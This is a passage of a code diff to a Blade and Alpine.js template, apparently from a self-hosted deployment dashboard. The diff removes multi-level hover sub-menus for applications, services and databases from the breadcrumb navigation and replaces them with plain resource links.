                                 :style="'position: absolute; left: 100%; top: ' + (envPositions['{{ $environment->uuid }}'] || 0) + 'px; z-index: 30;'"
                                 class="flex flex-col sm:flex-row items-start pl-1">
                                 <div
-                                    class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
+                                    class="relative w-56 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
                                     @foreach ($envResources as $envResource)
                                         @php
                                             $resType = $envResource['type'];
@@ -197,226 +188,14 @@ class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 bor
                                                 ]),
                                             };
                                             $isCurrentResource = $res->uuid === $currentResourceUuid;
-                                            // Use loaded relation count if available, otherwise check additional_servers_count attribute
-                                            $resHasMultipleServers = $resType === 'application' && method_exists($res, 'additional_servers') &&
-                                                ($res->relationLoaded('additional_servers') ? $res->additional_servers->count() > 0 : ($res->additional_servers_count ?? 0) > 0);
-                                            $resServerName = $resHasMultipleServers ? null : data_get($res, 'destination.server.name');
                                         @endphp
-                                        <div @mouseenter="openRes('{{ $environment->uuid }}-{{ $res->uuid }}'); resPositions['{{ $environment->uuid }}-{{ $res->uuid }}'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                            @mouseleave="closeRes()">
-                                            <a href="{{ $resRoute }}" {{ wireNavigate() }}
-                                                class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200 {{ $isCurrentResource ? 'dark:text-warning font-semibold' : '' }}"
-                                                title="{{ $res->name }}{{ $resServerName ? ' ('.$resServerName.')' : '' }}">
-                                                <span class="truncate">{{ $res->name }}@if($resServerName) <span class="text-xs text-neutral-400">({{ $resServerName }})</span>@endif</span>
-                                                <svg class="w-3 h-3 shrink-0" fill="none" stroke="currentColor"
-                                                    viewBox="0 0 24 24">
-                                                    <path stroke-linecap="round" stroke-linejoin="round"
-                                                        stroke-width="4" d="M9 5l7 7-7 7"></path>
-                                                </svg>
-                                            </a>
-                                        </div>
+                                        <a href="{{ $resRoute }}" {{ wireNavigate() }}
+                                            class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 {{ $isCurrentResource ? 'dark:text-warning font-semibold' : '' }}"
+                                            title="{{ $res->name }}">
+                                            {{ $res->name }}
+                                        </a>
                                     @endforeach
                                 </div>
-
-                                <!-- Main Menu Sub-dropdown (3rd level) -->
-                                @foreach ($envResources as $envResource)
-                                    @php
-                                        $resType = $envResource['type'];
-                                        $res = $envResource['resource'];
-                                        $resParams = [
-                                            'project_uuid' => $currentProjectUuid,
-                                            'environment_uuid' => $environment->uuid,
-                                        ];
-                                        if ($resType === 'application') {
-                                            $resParams['application_uuid'] = $res->uuid;
-                                        } elseif ($resType === 'service') {
-                                            $resParams['service_uuid'] = $res->uuid;
-                                        } else {
-                                            $resParams['database_uuid'] = $res->uuid;
-                                        }
-                                        $resKey = $environment->uuid . '-' . $res->uuid;
-                                    @endphp
-                                    <div x-show="activeRes === '{{ $resKey }}'" x-cloak
-                                        x-transition:enter="transition ease-out duration-150"
-                                        x-transition:enter-start="opacity-0" x-transition:enter-end="opacity-100"
-                                        @mouseenter="openRes('{{ $resKey }}')"
-                                        @mouseleave="closeRes()"
-                                        :style="'position: absolute; left: 100%; top: ' + (resPositions['{{ $resKey }}'] || 0) + 'px; z-index: 40;'"
-                                        class="flex flex-col sm:flex-row items-start pl-1">
-                                        <!-- Main Menu List -->
-                                        <div
-                                            class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200">
-                                            @if ($resType === 'application')
-                                                <div @mouseenter="openMenu('{{ $resKey }}-config'); menuPositions['{{ $resKey }}-config'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                    @mouseleave="closeMenu()">
-                                                    <a href="{{ route('project.application.configuration', $resParams) }}" {{ wireNavigate() }}
-                                                        class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                                        <span>Configuration</span>
-                                                        <svg class="w-3 h-3 shrink-0" fill="none"
-                                                            stroke="currentColor" viewBox="0 0 24 24">
-                                                            <path stroke-linecap="round" stroke-linejoin="round"
-                                                                stroke-width="4" d="M9 5l7 7-7 7"></path>
-                                                        </svg>
-                                                    </a>
-                                                </div>
-                                                <a href="{{ route('project.application.deployment.index', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Deployments</a>
-                                                <a href="{{ route('project.application.logs', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Logs</a>
-                                                @can('canAccessTerminal')
-                                                    <a href="{{ route('project.application.command', $resParams) }}"
-                                                        class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Terminal</a>
-                                                @endcan
-                                            @elseif ($resType === 'service')
-                                                <div @mouseenter="openMenu('{{ $resKey }}-config'); menuPositions['{{ $resKey }}-config'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                    @mouseleave="closeMenu()">
-                                                    <a href="{{ route('project.service.configuration', $resParams) }}" {{ wireNavigate() }}
-                                                        class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                                        <span>Configuration</span>
-                                                        <svg class="w-3 h-3 shrink-0" fill="none"
-                                                            stroke="currentColor" viewBox="0 0 24 24">
-                                                            <path stroke-linecap="round" stroke-linejoin="round"
-                                                                stroke-width="4" d="M9 5l7 7-7 7"></path>
-                                                        </svg>
-                                                    </a>
-                                                </div>
-                                                <a href="{{ route('project.service.logs', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Logs</a>
-                                                @can('canAccessTerminal')
-                                                    <a href="{{ route('project.service.command', $resParams) }}"
-                                                        class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Terminal</a>
-                                                @endcan
-                                            @else
-                                                <div @mouseenter="openMenu('{{ $resKey }}-config'); menuPositions['{{ $resKey }}-config'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                    @mouseleave="closeMenu()">
-                                                    <a href="{{ route('project.database.configuration', $resParams) }}" {{ wireNavigate() }}
-                                                        class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                                        <span>Configuration</span>
-                                                        <svg class="w-3 h-3 shrink-0" fill="none"
-                                                            stroke="currentColor" viewBox="0 0 24 24">
-                                                            <path stroke-linecap="round" stroke-linejoin="round"
-                                                                stroke-width="4" d="M9 5l7 7-7 7"></path>
-                                                        </svg>
-                                                    </a>
-                                                </div>
-                                                <a href="{{ route('project.database.logs', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Logs</a>
-                                                @can('canAccessTerminal')
-                                                    <a href="{{ route('project.database.command', $resParams) }}"
-                                                        class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Terminal</a>
-                                                @endcan
-                                                @if (
-                                                    $res->getMorphClass() === 'App\Models\StandalonePostgresql' ||
-                                                        $res->getMorphClass() === 'App\Models\StandaloneMongodb' ||
-                                                        $res->getMorphClass() === 'App\Models\StandaloneMysql' ||
-                                                        $res->getMorphClass() === 'App\Models\StandaloneMariadb')
-                                                    <a href="{{ route('project.database.backup.index', $resParams) }}" {{ wireNavigate() }}
-                                                        class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Backups</a>
-                                                @endif
-                                            @endif
-                                        </div>
-
-                                        <!-- Configuration Sub-menu (4th level) -->
-                                        <div x-show="activeMenuEnv === '{{ $resKey }}-config'" x-cloak
-                                            x-transition:enter="transition ease-out duration-150"
-                                            x-transition:enter-start="opacity-0" x-transition:enter-end="opacity-100"
-                                            @mouseenter="openMenu('{{ $resKey }}-config')"
-                                            @mouseleave="closeMenu()"
-                                            :style="'position: absolute; left: 100%; top: ' + (menuPositions['{{ $resKey }}-config'] || 0) + 'px; z-index: 50;'"
-                                            class="pl-1">
-                                        <div class="w-52 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
-                                            @if ($resType === 'application')
-                                                <a href="{{ route('project.application.configuration', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                                                <a href="{{ route('project.application.environment-variables', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                                    Variables</a>
-                                                <a href="{{ route('project.application.persistent-storage', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Persistent
-                                                    Storage</a>
-                                                <a href="{{ route('project.application.source', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Source</a>
-                                                <a href="{{ route('project.application.servers', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Servers</a>
-                                                <a href="{{ route('project.application.scheduled-tasks.show', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Scheduled
-                                                    Tasks</a>
-                                                <a href="{{ route('project.application.webhooks', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                                                <a href="{{ route('project.application.preview-deployments', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Preview
-                                                    Deployments</a>
-                                                <a href="{{ route('project.application.healthcheck', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Healthcheck</a>
-                                                <a href="{{ route('project.application.rollback', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Rollback</a>
-                                                <a href="{{ route('project.application.resource-limits', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                    Limits</a>
-                                                <a href="{{ route('project.application.resource-operations', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                    Operations</a>
-                                                <a href="{{ route('project.application.metrics', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Metrics</a>
-                                                <a href="{{ route('project.application.tags', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                                                <a href="{{ route('project.application.advanced', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Advanced</a>
-                                                <a href="{{ route('project.application.danger', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                                    Zone</a>
-                                            @elseif ($resType === 'service')
-                                                <a href="{{ route('project.service.configuration', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                                                <a href="{{ route('project.service.environment-variables', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                                    Variables</a>
-                                                <a href="{{ route('project.service.storages', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Storages</a>
-                                                <a href="{{ route('project.service.scheduled-tasks.show', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Scheduled
-                                                    Tasks</a>
-                                                <a href="{{ route('project.service.webhooks', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                                                <a href="{{ route('project.service.resource-operations', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                    Operations</a>
-                                                <a href="{{ route('project.service.tags', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                                                <a href="{{ route('project.service.danger', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                                    Zone</a>
-                                            @else
-                                                <a href="{{ route('project.database.configuration', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                                                <a href="{{ route('project.database.environment-variables', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                                    Variables</a>
-                                                <a href="{{ route('project.database.servers', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Servers</a>
-                                                <a href="{{ route('project.database.persistent-storage', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Persistent
-                                                    Storage</a>
-                                                <a href="{{ route('project.database.webhooks', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                                                <a href="{{ route('project.database.resource-limits', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                    Limits</a>
-                                                <a href="{{ route('project.database.resource-operations', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                    Operations</a>
-                                                <a href="{{ route('project.database.metrics', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Metrics</a>
-                                                <a href="{{ route('project.database.tags', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                                                <a href="{{ route('project.database.danger', $resParams) }}" {{ wireNavigate() }}
-                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                                    Zone</a>
-                                            @endif
-                                        </div>
-                                        </div>
-                                    </div>
-                                @endforeach
                             </div>
                         @endif
                     @endforeach
@@ -431,7 +210,6 @@ class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolg
             $isApplication = $resourceType === 'App\Models\Application';
             $isService = $resourceType === 'App\Models\Service';
             $isDatabase = str_contains($resourceType, 'Database') || str_contains($resourceType, 'Standalone');
-            // Use loaded relation count if available, otherwise check additional_servers_count attribute
             $hasMultipleServers = $isApplication && method_exists($resource, 'additional_servers') &&
                 ($resource->relationLoaded('additional_servers') ? $resource->additional_servers->count() > 0 : ($resource->additional_servers_count ?? 0) > 0);
             $serverName = $hasMultipleServers ? null : data_get($resource, 'destination.server.name');
@@ -447,221 +225,16 @@ class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolg
                 $routeParams['database_uuid'] = $resourceUuid;
             }
         @endphp
-        <li class="inline-flex items-center" x-data="{ resourceOpen: false, activeMenu: null, menuPosition: 0, closeTimeout: null, menuTimeout: null, toggle() { this.resourceOpen = !this.resourceOpen; if (!this.resourceOpen) { this.activeMenu = null; } }, open() { clearTimeout(this.closeTimeout); this.resourceOpen = true }, close() { this.closeTimeout = setTimeout(() => { this.resourceOpen = false; this.activeMenu = null; }, 100) }, openMenu(id) { clearTimeout(this.closeTimeout); clearTimeout(this.menuTimeout); this.activeMenu = id }, closeMenu() { this.menuTimeout = setTimeout(() => { this.activeMenu = null; }, 100) } }">
-            <div class="flex items-center relative" @mouseenter="open()"
-                @mouseleave="close()">
-                <a class="text-xs truncate lg:text-sm hover:text-warning" {{ wireNavigate() }}
-                    href="{{ $isApplication
-                        ? route('project.application.configuration', $routeParams)
-                        : ($isService
-                            ? route('project.service.configuration', $routeParams)
-                            : route('project.database.configuration', $routeParams)) }}"
-                    title="{{ data_get($resource, 'name') }}{{ $serverName ? ' ('.$serverName.')' : '' }}">
-                    {{ data_get($resource, 'name') }}@if($serverName) <span class="text-xs text-neutral-400">({{ $serverName }})</span>@endif
-                </a>
-                <button type="button" @click.stop="toggle()" class="px-1 text-warning">
-                    <svg class="w-3 h-3 transition-transform" :class="{ 'rotate-down': resourceOpen }" fill="none"
-                        stroke="currentColor" viewBox="0 0 24 24">
-                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="4" d="M9 5l7 7-7 7">
-                        </path>
-                    </svg>
-                </button>
-
-                <!-- Resource Dropdown Container -->
-                <div x-show="resourceOpen" @click.outside="close()" x-transition:enter="transition ease-out duration-200"
-                    x-transition:enter-start="opacity-0 scale-95" x-transition:enter-end="opacity-100 scale-100"
-                    x-transition:leave="transition ease-in duration-75"
-                    x-transition:leave-start="opacity-100 scale-100" x-transition:leave-end="opacity-0 scale-95"
-                    class="absolute z-20 top-full mt-1 left-0 sm:left-auto max-w-[calc(100vw-1rem)]" x-init="$nextTick(() => { const rect = $el.getBoundingClientRect(); if (rect.right > window.innerWidth) { $el.style.left = 'auto'; $el.style.right = '0'; } })">
-                    <!-- Main Menu List -->
-                    <div
-                        class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200">
-                        @if ($isApplication)
-                            <!-- Application Main Menus -->
-                            <div @mouseenter="openMenu('config'); menuPosition = $el.offsetTop" @mouseleave="closeMenu()">
-                                <a href="{{ route('project.application.configuration', $routeParams) }}" {{ wireNavigate() }}
-                                    class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    <span>Configuration</span>
-                                    <svg class="w-3 h-3 shrink-0" fill="none" stroke="currentColor"
-                                        viewBox="0 0 24 24">
-                                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
-                                            d="M9 5l7 7-7 7"></path>
-                                    </svg>
-                                </a>
-                            </div>
-                            <a href="{{ route('project.application.deployment.index', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                Deployments
-                            </a>
-                            <a href="{{ route('project.application.logs', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                Logs
-                            </a>
-                            @can('canAccessTerminal')
-                                <a href="{{ route('project.application.command', $routeParams) }}"
-                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    Terminal
-                                </a>
-                            @endcan
-                        @elseif ($isService)
-                            <!-- Service Main Menus -->
-                            <div @mouseenter="openMenu('config'); menuPosition = $el.offsetTop" @mouseleave="closeMenu()">
-                                <a href="{{ route('project.service.configuration', $routeParams) }}" {{ wireNavigate() }}
-                                    class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    <span>Configuration</span>
-                                    <svg class="w-4 h-4 shrink-0" fill="none" stroke="currentColor"
-                                        viewBox="0 0 24 24">
-                                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                            d="M9 5l7 7-7 7"></path>
-                                    </svg>
-                                </a>
-                            </div>
-                            <a href="{{ route('project.service.logs', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                Logs
-                            </a>
-                            @can('canAccessTerminal')
-                                <a href="{{ route('project.service.command', $routeParams) }}"
-                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    Terminal
-                                </a>
-                            @endcan
-                        @else
-                            <!-- Database Main Menus -->
-                            <div @mouseenter="openMenu('config'); menuPosition = $el.offsetTop" @mouseleave="closeMenu()">
-                                <a href="{{ route('project.database.configuration', $routeParams) }}" {{ wireNavigate() }}
-                                    class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    <span>Configuration</span>
-                                    <svg class="w-4 h-4 shrink-0" fill="none" stroke="currentColor"
-                                        viewBox="0 0 24 24">
-                                        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                                            d="M9 5l7 7-7 7"></path>
-                                    </svg>
-                                </a>
-                            </div>
-                            <a href="{{ route('project.database.logs', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                Logs
-                            </a>
-                            @can('canAccessTerminal')
-                                <a href="{{ route('project.database.command', $routeParams) }}"
-                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    Terminal
-                                </a>
-                            @endcan
-                            @if (
-                                $resourceType === 'App\Models\StandalonePostgresql' ||
-                                    $resourceType === 'App\Models\StandaloneMongodb' ||
-                                    $resourceType === 'App\Models\StandaloneMysql' ||
-                                    $resourceType === 'App\Models\StandaloneMariadb')
-                                <a href="{{ route('project.database.backup.index', $routeParams) }}" {{ wireNavigate() }}
-                                    class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                    Backups
-                                </a>
-                            @endif
-                        @endif
-                    </div>
-
-                    <!-- Configuration Sub-menu -->
-                    <div x-show="activeMenu === 'config'" x-cloak x-transition:enter="transition ease-out duration-150"
-                        x-transition:enter-start="opacity-0" x-transition:enter-end="opacity-100"
-                        @mouseenter="openMenu('config')"
-                        @mouseleave="closeMenu()"
-                        :style="'position: absolute; left: 100%; top: ' + menuPosition + 'px; z-index: 50;'"
-                        class="pl-1">
-                        <div class="w-52 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
-                        @if ($isApplication)
-                            <a href="{{ route('project.application.configuration', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                            <a href="{{ route('project.application.environment-variables', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                Variables</a>
-                            <a href="{{ route('project.application.persistent-storage', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Persistent
-                                Storage</a>
-                            <a href="{{ route('project.application.source', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Source</a>
-                            <a href="{{ route('project.application.servers', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Servers</a>
-                            <a href="{{ route('project.application.scheduled-tasks.show', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Scheduled
-                                Tasks</a>
-                            <a href="{{ route('project.application.webhooks', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                            <a href="{{ route('project.application.preview-deployments', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Preview
-                                Deployments</a>
-                            <a href="{{ route('project.application.healthcheck', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Healthcheck</a>
-                            <a href="{{ route('project.application.rollback', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Rollback</a>
-                            <a href="{{ route('project.application.resource-limits', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                Limits</a>
-                            <a href="{{ route('project.application.resource-operations', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                Operations</a>
-                            <a href="{{ route('project.application.metrics', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Metrics</a>
-                            <a href="{{ route('project.application.tags', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                            <a href="{{ route('project.application.advanced', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Advanced</a>
-                            <a href="{{ route('project.application.danger', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                Zone</a>
-                        @elseif ($isService)
-                            <a href="{{ route('project.service.configuration', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                            <a href="{{ route('project.service.environment-variables', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                Variables</a>
-                            <a href="{{ route('project.service.storages', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Storages</a>
-                            <a href="{{ route('project.service.scheduled-tasks.show', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Scheduled
-                                Tasks</a>
-                            <a href="{{ route('project.service.webhooks', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                            <a href="{{ route('project.service.resource-operations', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                Operations</a>
-                            <a href="{{ route('project.service.tags', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                            <a href="{{ route('project.service.danger', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                Zone</a>
-                        @else
-                            <a href="{{ route('project.database.configuration', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                            <a href="{{ route('project.database.environment-variables', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                Variables</a>
-                            <a href="{{ route('project.database.servers', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Servers</a>
-                            <a href="{{ route('project.database.persistent-storage', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Persistent
-                                Storage</a>
-                            <a href="{{ route('project.database.webhooks', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
